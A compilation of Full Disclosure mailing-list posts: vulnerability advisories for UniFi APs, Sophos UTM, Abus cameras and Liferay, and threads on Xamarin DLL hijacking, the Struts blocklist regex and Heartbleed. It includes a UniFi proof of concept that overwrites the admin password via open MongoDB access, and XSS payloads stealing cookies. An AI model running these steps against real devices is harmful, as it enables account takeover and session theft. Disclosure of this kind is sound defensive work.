Hello @all, together with my colleague we found two uncritical vulnerabilities you'll find below. Product: UniFi AP AC Lite Vendor: Ubiquiti Networks Inc. Internal reference: ? (Bug ID) Vulnerability type: Incorrect access control Vulnerable version: Unify 5.2.7 and possible other versions affected (not tested) Vulnerable component: Database Report confidence: yes Solution status: Not fixed by Vendor, the bug is a feature. Fixed versions: - Researcher credits: Tim Schughart, Immanuel Bär, Khanh Quoc Pham of ProSec Networks Solution date: - Public disclosure: 2016-09-30 CVE reference: CVE-2016-7792 CVSSv3: 8.8 AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Vulnerability Details: You are able to connect to the access points database, because of an broken authentication (OWASP TOP10). So you are able to modify the database and read the data. An possible scenario you'll find in PoC section. Risk: An attacker gets access to the database and for e.g. is able to change the admins password, like you see in PoC below. PoC: 1. Generate SHA512 Hash with e.g. mkpasswd -m sha-512 2. Connect via network to database, e.g. : mongo --port 27117 --host target_ip 3. Change password via command "db.admin.update({"name":"ProSec"}, {$set : {"x_shadow": "$6$Se9i5I7k3hI8d4bk$CqEXRUwk7c7A/62E/HcC4SrMSLOrBdm7wRvwTS4t.nNJA3RYta0RfzJpuREg.qcAHsPGW9Gjwm3krJROXzbCv."}})" 4. Login via web interface with new password Best regards / Mit freundlichen Grüßen Tim Schughart CEO / Geschäftsführer -- ProSec Networks e.K. Ellingshohl 82 56077 Koblenz Website: https://www.prosec-networks.com E-Mail: t.schugh...@prosec.networks.com Mobile: +49 (0)157 7901 5826 Phone: +49 (0)261 450 930 90 "This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or LEGALLY PROTECTED information and is intended only for the named recipient(s). Any unauthorized use, dissemination, copying or forwarding is strictly prohibited. If you are not the intended recipient and have received this email communication in error, please notify the sender immediately, delete it and destroy all copies of this E-Mail. VAT ID: DE290654714 legal domicile Koblenz, HRA 21625.“ "Diese E-Mail Mitteilung kann VERTRAULICHE, dem BERUFSGEHEIMNIS UNTERLIEGENDE und/oder RECHTLICH GESCHÜTZTE Informationen enthalten und ist ausschließlich für den/die genannten Adressaten bestimmt. Jede unbefugte Nutzung, Weitergabe, Vervielfältigung oder Versendung ist strengstens verboten. Sollten Sie nicht der angegebene Adressat sein und diese E-Mail Mitteilung irrtümlich erhalten haben, informieren Sie bitte sofort den Absender, löschen diese E-Mail und vernichten alle Kopien. USt-IdNr.: DE290654714, Amtsgericht Koblenz, HRA 21625." ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Multiple exposures in Sophos UTM
Hello @all, together with my colleague we found two uncritical vulnerabilities you'll find below. Product: Sophos UTM Vendor: Sophos ltd. Internal reference: ? (Bug ID) Vulnerability type: Information Disclosure Vulnerable version: 9.405-5, 9.404-5 and possible other versions affected (not tested) Vulnerable component: Frontend Report confidence: yes Solution status: Not fixed by Vendor, no further responses from vendor. Fixed versions: - Researcher credits: Tim Schughart & Khanh Quoc Pham of ProSec Networks Vendor notification: 2016-09-01 Solution date: - Public disclosure: 2016-09-30 CVE reference: CVE-2016-7397 CVSSv3: 6.7 AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:N Report timeline: 2016-09-01: Contacted Vendor, vendor acknowledged, no further response 2016-09-12: Contacted Vendor again, started to fix 2016-09-30: Contacted Vendor again, because there has been no response to our request and our initial told disclosing date, no response again. 2016-09-30: Public Disclosure. Vulnerability Details: The password is reflected to DOM and is readable through the "value" field of the SMTP user settings in notifications tab. You have to be authenticated to access the configuration tab. Risk: An attacker gets access to the configured mailbox. Because of Sophos UTM is a multi user system, this is a problem in bigger company environments with splitted admin rights. The surface scope is changed, because in bigger environments you are getting access to the configured mailbox, which results in an integrity loss. Steps to reproduce: See vulnerability details. -- Product: Sophos UTM Vendor: Sophos ltd. Internal reference: ? (Bug ID) Vulnerability type: Information Disclosure Vulnerable version: 9.405-5, 9.404-5 and possible other versions affected (not tested) Vulnerable component: Frontend Report confidence: ? Solution status: Not fixed by Vendor Fixed versions: - Researcher credits: Tim Schughart & Khanh Quoc Pham of ProSec Networks Vendor notification: 2016-09-01 Solution date: - Public disclosure: 2016-10-01 CVE reference: CVE-2016-7442 CVSSv3: 6.7 AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:N Vulnerability Details: The password is reflected to DOM and is readable through the "value" field of the proxy user settings in the system settings / scan settings / anti spam. You have to be authenticated to access the configuration tab. Risk: An attacker gets access to the configured proxy user. Because of Sophos UTM is a multi user system, this is a problem in bigger company environments with splitted admin rights. The surface scope is changed, because in bigger environments you are getting access to the configured proxy user, which results in an privilege escalation. Steps to reproduce: See vulnerability details. Best regards / Mit freundlichen Grüßen Tim Schughart CEO / Geschäftsführer -- ProSec Networks e.K. Ellingshohl 82 56077 Koblenz Website: https://www.prosec-networks.com E-Mail: t.schugh...@prosec.networks.com Mobile: +49 (0)157 7901 5826 Phone: +49 (0)261 450 930 90 "This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or LEGALLY PROTECTED information and is intended only for the named recipient(s). Any unauthorized use, dissemination, copying or forwarding is strictly prohibited. If you are not the intended recipient and have received this email communication in error, please notify the sender immediately, delete it and destroy all copies of this E-Mail. VAT ID: DE290654714 legal domicile Koblenz, HRA 21625.“ "Diese E-Mail Mitteilung kann VERTRAULICHE, dem BERUFSGEHEIMNIS UNTERLIEGENDE und/oder RECHTLICH GESCHÜTZTE Informationen enthalten und ist ausschließlich für den/die genannten Adressaten bestimmt. Jede unbefugte Nutzung, Weitergabe, Vervielfältigung oder Versendung ist strengstens verboten. Sollten Sie nicht der angegebene Adressat sein und diese E-Mail Mitteilung irrtümlich erhalten haben, informieren Sie bitte sofort den Absender, löschen diese E-Mail und vernichten alle Kopien. USt-IdNr.: DE290654714, Amtsgericht Koblenz, HRA 21625." ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Persistent XSS in Abus Security Center - CVSS 8.0
Hi@all, Product: Abus Security Cams Vendor:Abus Group Internal reference: - Vulnerability type: Cross Site Scripting Vulnerable version: 0101a and possible other versions affected (not tested) Vulnerable component: FTP Report confidence: Confirmed Solution status: Not fixed by Vendor, will not patch the vuln. Fixed versions: - Researcher credits: Tim Schughart & Khanh Quoc Pham of ProSec Networks Vendor notification: 2016-09-21 Solution date: Public disclosure: 2016-09-29 CVE reference: CVSSv3: 8.0 AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H <https://nvd.nist.gov/cvss/v3-calculator?vector=AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H> Vulnerability Details: The entered username via FTP login is reflected to the log which is rendered in the web interface without input validation. This results in an successfull, persistent, XSS. Risk: Through this you are able to get e.g. the session cookies of the cams administrator. So you are able to get full access - persistent. PoC: FTP Username: alert(document.cookie) FTP Pass: any Browse to log and watch the popup :) Best regards / Mit freundlichen Grüßen Tim Schughart CEO / Geschäftsführer -- ProSec Networks e.K. Ellingshohl 82 56076 Koblenz Website: https://www.prosec-networks.com <http://www.prosec-networks.com/> E-Mail: t.schugh...@prosec.networks.com <mailto:i...@prosec.networks.com> Mobile: +49 (0)157 7901 5826 Phone: +49 (0)261 450 930 90 "This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or LEGALLY PROTECTED information and is intended only for the named recipient(s). Any unauthorized use, dissemination, copying or forwarding is strictly prohibited. If you are not the intended recipient and have received this email communication in error, please notify the sender immediately, delete it and destroy all copies of this E-Mail. VAT ID: DE290654714 legal domicile Koblenz, HRA 21621.“ "Diese E-Mail Mitteilung kann VERTRAULICHE, dem BERUFSGEHEIMNIS UNTERLIEGENDE und/oder RECHTLICH GESCHÜTZTE Informationen enthalten und ist ausschließlich für den/die genannten Adressaten bestimmt. Jede unbefugte Nutzung, Weitergabe, Vervielfältigung oder Versendung ist strengstens verboten. Sollten Sie nicht der angegebene Adressat sein und diese E-Mail Mitteilung irrtümlich erhalten haben, informieren Sie bitte sofort den Absender, löschen diese E-Mail und vernichten alle Kopien. USt-IdNr.: DE290654714, Amtsgericht Koblenz, HRA 21621." ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Sicherheitslücke - Liferay Portal Enterprise Edition
Hey guys, during a penatrationtest I have found an unknown persistent xss in liferay portal backend. ## #General Information# ## Manufacture description: Liferay Portal is an enterprise-web-platform for the development of business solutions, which provides quick results and long-term values. #Details# · Product: Liferay Portal Enterprise Edition (6.2 EE SP13) · Affected versions : All <= 6.2 EE SP13 · Type of attack: Persistent Cross Site Scripting · Proof Of Concept: Yes, 6.2 EE SP13 · Authentication required: Yes · Reason: Missing input validation · Impact: Injection of malicious JavaScript code ## #PoC# ## You have to be authenticated in the administrator backend. Here you have to browse to the control center: - In configuration click on portal settings - Select authentication - Select ldap - select add server - input following code in server name Value for ldap server name field: Name_of_ldap_serveralert("XSS") The script is inserted to the configuration page persistent until the ldap server is deleted from database again. Best regards / Mit freundlichen Grüßen Tim Schughart CEO | IT Security specialist ProSec Networks Website: http://www.prosec-networks.com <http://www.prosec-networks.com/> E-Mail: i...@prosec.networks.com <mailto:i...@prosec.networks.com> Phone: +49(0) 2621 9469 252 "This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or LEGALLY PROTECTED information and is intended only for the named recipient(s). Any unauthorized use, dissemination, copying or forwarding is strictly prohibited. If you are not the intended recipient and have received this email communication in error, please notify the sender immediately, delete it and destroy all copies of this E-Mail. VAT ID: DE290654714 legal domicile Koblenz.“ "Diese E-Mail Mitteilung kann VERTRAULICHE, dem BERUFSGEHEIMNIS UNTERLIEGENDE und/oder RECHTLICH GESCHÜTZTE Informationen enthalten und ist ausschließlich für den/die genannten Adressaten bestimmt. Jede unbefugte Nutzung, Weitergabe, Vervielfältigung oder Versendung ist strengstens verboten. Sollten Sie nicht der angegebene Adressat sein und diese E-Mail Mitteilung irrtümlich erhalten haben, informieren Sie bitte sofort den Absender, löschen diese E-Mail und vernichten alle Kopien. USt-IdNr.: DE290654714, Amtsgericht Koblenz." signature.asc Description: Message signed with OpenPGP using GPGMail ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Xamarin for Android 5.1 DLL Hijack Vulnerability
Isn't this the public bug tracker? https://bugzilla.xamarin.com/describecomponents.cgi?product=Android Though, correct that case id doesn't map to anything there. -Tim Strazzere On Tue, May 19, 2015 at 2:32 PM, ValdikSS i...@valdikss.org.ru wrote: They don't have public bugtracker. Case ID is 140518. On 05/20/2015 12:29 AM, Tim wrote: Thanks for posting this to FD, these didn't even include it in their release notes; http://developer.xamarin.com/releases/android/xamarin.android_5/xamarin.android_5.1/ Was there a bug reported in bugzilla to link back too? -Tim Strazzere On Tue, May 19, 2015 at 6:49 AM, ValdikSS i...@valdikss.org.ru mailto:i...@valdikss.org.ru i...@valdikss.org.ru wrote: Xamarin for Android prior to version 5.1 allows to replace internal DLL files inside the APK with files on SD card which are not in a secure storage. Malicious application without any special permissions could drop backdoored DLL files into /storage/sdcard0/Android/data/app_id/files/.__override__/ and the victim application would use files from SD. Not just the main application library could be hijacked, but also Xamarin's System.dll and Mono.Android.dll, which are shipped in all Xamarin for Android applications. Developers should rebuild their applications using Xamarin for Android 5.1 or newer in the release mode. This vulnerability was found by accident, which allowed me to eat for free for a month. Timeline: 03.04.2015 Vulnerability is found 07.04.2015 Message sent to Xamarin 08.04.2015 Xamarin acknowledged the vulnerability 29.04.2015 Fixed stable version released ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
Re: [FD] Xamarin for Android 5.1 DLL Hijack Vulnerability
Thanks for posting this to FD, these didn't even include it in their release notes; http://developer.xamarin.com/releases/android/xamarin.android_5/xamarin.android_5.1/ Was there a bug reported in bugzilla to link back too? -Tim Strazzere On Tue, May 19, 2015 at 6:49 AM, ValdikSS i...@valdikss.org.ru wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Xamarin for Android prior to version 5.1 allows to replace internal DLL files inside the APK with files on SD card which are not in a secure storage. Malicious application without any special permissions could drop backdoored DLL files into /storage/sdcard0/Android/data/app_id/files/.__override__/ and the victim application would use files from SD. Not just the main application library could be hijacked, but also Xamarin's System.dll and Mono.Android.dll, which are shipped in all Xamarin for Android applications. Developers should rebuild their applications using Xamarin for Android 5.1 or newer in the release mode. This vulnerability was found by accident, which allowed me to eat for free for a month. Timeline: 03.04.2015 Vulnerability is found 07.04.2015 Message sent to Xamarin 08.04.2015 Xamarin acknowledged the vulnerability 29.04.2015 Fixed stable version released -BEGIN PGP SIGNATURE- Version: GnuPG v2 Comment: https://keybase.io/valdikss iQIcBAEBCAAGBQJVWz98AAoJEFzXIC7viPdyP3wP/3Vxrc0hHZATTfkCVq688sJa /NI2Z7cdRf3cpHSLCciWbtcNK82uE6qmHisFwUQGA5xvljhrkAXLPa2xG3wShmXq G5ID3WexMWgTfLqYwOi/4fq1jpfeEg5vpDFAhj0JuWAvZg1zOwFBQ7UdT6G/eu1C +Dgmk1qpvLcPkKOrh2i4xwqkDfqNfADfK7ekjeqMZe70tC95eHLeRWzVEmi+hCC3 zLwnuprHOEQ/CGeKiQJzePExARFyIfS/kuV+YPdw14gmEOwKAfFymuaxYqULqaxS H6RdUJp2SZT5cf0RSlA7zqPhX8fqnkiBiCpd8BstoANl+dFvnggVks6PWovBm8aW huYqscwDZ0pGG8kV5lPO/9fE2P/1nm9B1h9tOcycD8gpM7inbDy6WoETwO0KZOlx qsetTdYt4PA5V6Wn6wks4R9iPZy7bFlqzrGWLWFY9FYV7a0cZoDi7eY8bNhxFj/T g3M1ruIIRVxriyFjcfmq2nWw0rMFhiaDdb/GuQEmtN8b2CQRQmiBrvP1uC2zkOhW ijdYsN7SMjvLTch3n6TU3ycibB0uEp03Jgm2+wRzZj5VQXUHR7BFzhh74UeeAriT K7EialPddQzxPFS0ufTGQ1JFfjJP3bgZFLDwbJVt/WLwsgQpLmXcTjHub56lr87y xQmqbzDDykOJ92uZEJ4X =vW6d -END PGP SIGNATURE- ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
Re: [FD] [ANN] Struts 2 up to 2.3.16.1: Zero-Day Exploit Mitigation (security | critical)
Also, I'm a tad confused by the regex you have as a stop-gap. For the readers' convenience: (.*\.|^|.*|\[('|))(c|C)lass(\.|('|)]|\[).*,^dojo\..*,^struts\..*,^session\..*,^request\..*,^application\..*,^servlet(Request|Response)\..*,^parameters\..*,^action:.*,^method:.* If your regex evaluation is case-sensitive, then clearly you need to check for class and Class, since OGNL converts foo to getFoo, and would likely also convert Foo to getFoo. But if the blacklist is case sensitive, then don't you also need to check for ^Request..., ^Session..., ^Struts..., and so on? Or is it actually case insensitive and you're just being unnecessarily careful with class? Also: Thought about unicode lately? tim PS- yes, I'm too lazy to actually look at the Struts code right now. On Fri, Apr 25, 2014 at 09:52:23AM -0700, Tim wrote: So I have to say, I feel like the Struts team is kind of... failing. Here are my gripes: A) I questioned the last bug fix in the thread here [1], where we were all reassured that it was just ClassLoader manipulation, not RCE. Clearly that's not true. B) The fix for the last CVE was that crappy ^class\. filter, which I pointed out was insufficient. The Struts team quickly fixed that, but never bothered to update the workaround section in the last advisory to the less-terrible .*\.class\..* regex (or whatever it was). So if developers just implemented the work around from the advisory, they were obviously not protected. (In hindsight, they never were protected even with the better regex, but was just irresponsible not to make the second regex more public.) C) The Struts team is playing whack-a-mole. Instead of fixing the root issue, they are just adding one blacklist regex after another, hoping no one figures out yet another way around it. I urge you to take OGNL and *throw it out*. Replace it with something that allows only a white list of properties to be set, based on what the application defines as relevant. Until then, I'm recommending to my clients that they avoid Struts like the plague. tim 1. http://seclists.org/fulldisclosure/2014/Mar/53 On Thu, Apr 24, 2014 at 05:37:13PM +0200, Rene Gielen wrote: In Struts 2.3.16.1, an issue with ClassLoader manipulation via request parameters was supposed to be resolved. Unfortunately, the correction wasn't sufficient. A security fix release fully addressing this issue is in preparation and will be released as soon as possible. Once the release is available, all Struts 2 users are strongly recommended to update their installations. * Until the release is available, all Struts 2 users are strongly recommended to apply the mitigation described in [1] * Please follow the Apache Struts announcement channels [2][3][4][5] to stay updated regarding the upcoming security release. Most likely the release will be available within the next 72 hours. Please prepare for upgrading all Struts 2 based production systems to the new release version once available. - The Apache Struts Team. [1] http://struts.apache.org/announce.html#a20140424 [2] http://struts.apache.org/mail.html [3] http://struts.apache.org/announce.html [4] https://plus.google.com/+ApacheStruts/posts [5] https://twitter.com/TheApacheStruts -- René Gielen http://twitter.com/rgielen ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
Re: [FD] Audit: don't only focus on heartbleed issue
and the others need a MITM attack which is not *that* easy as connect to a server and send a heartbleed-packet without anything in the logs of the attacked server I agree with you here. It seems that Lucky13 requires much more access and is much harder to pull off in practice. Unless there's new techniques out there that I haven't kept up on frankly outside a public hotspot / untrusted network nobody but the NSA and otehr agencies are able to really to MITM This I think is a misconception, or at least overstated. Anyone on the same network as you can MitM you. Anyone on the same network as the remote end point can MitM you. For some reason in this day and age people have all forgotten about ARP poisoning, netbios name poisoning, DHCP hijacking, and a whole host of other ways to redirect traffic. And apparently random people halfway around the world can hijack your DNS resolver[1]. The dividing line between internal network and the Internet is becoming fuzzier every day. It is getting easier to get inside and yet everyone still seems to run an unsegmented internal trusted network. tim 1. http://arstechnica.com/information-technology/2014/03/google-dns-briefly-hijacked-to-venezuela/ ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
Re: [FD] heartbleed OpenSSL bug CVE-2014-0160
Nope, works also on other protocols like IMAPS. Am 08.04.2014 15:30, schrieb Chris Schmidt: The bug is in the TLS implementation in OpenSSL, you will only see it on https Sent from my iPhone On Apr 8, 2014, at 4:43 AM, Nik Mitev n...@mitev.net wrote: I used the tool Kirils linked (http://possible.lv/tools/hb/) and my unpatched servers running a Tor node or an Openvpn server returned correct (old) version of openssl but not vulnerable. Is it the bug or the tool that seems to be limited to https I wonder? Patched now so can't test with this tool... -Original Message- From: Fraser Scott fraser.sc...@gmail.com To: fulldisclosure@seclists.org Subject: Re: [FD] heartbleed OpenSSL bug CVE-2014-0160 Date: Tue, 8 Apr 2014 10:24:02 +0100 This seems to be the best test so far: http://s3.jspenguin.org/ssltest.py Other tests false-positive on patched versions from what I can see. On 8 April 2014 01:10, Kirils Solovjovs kirils.solovj...@kirils.com wrote: We are doomed. Description: http://www.openssl.org/news/vulnerabilities.html Article dedicated to the bug: http://heartbleed.com/ Tool to check if TLS heartbeat extension is supported: http://possible.lv/tools/hb/ A missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64kB of memory to a connected client or server. 1.0.1[ abcdef] affected. P.S. Happy Monday! ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/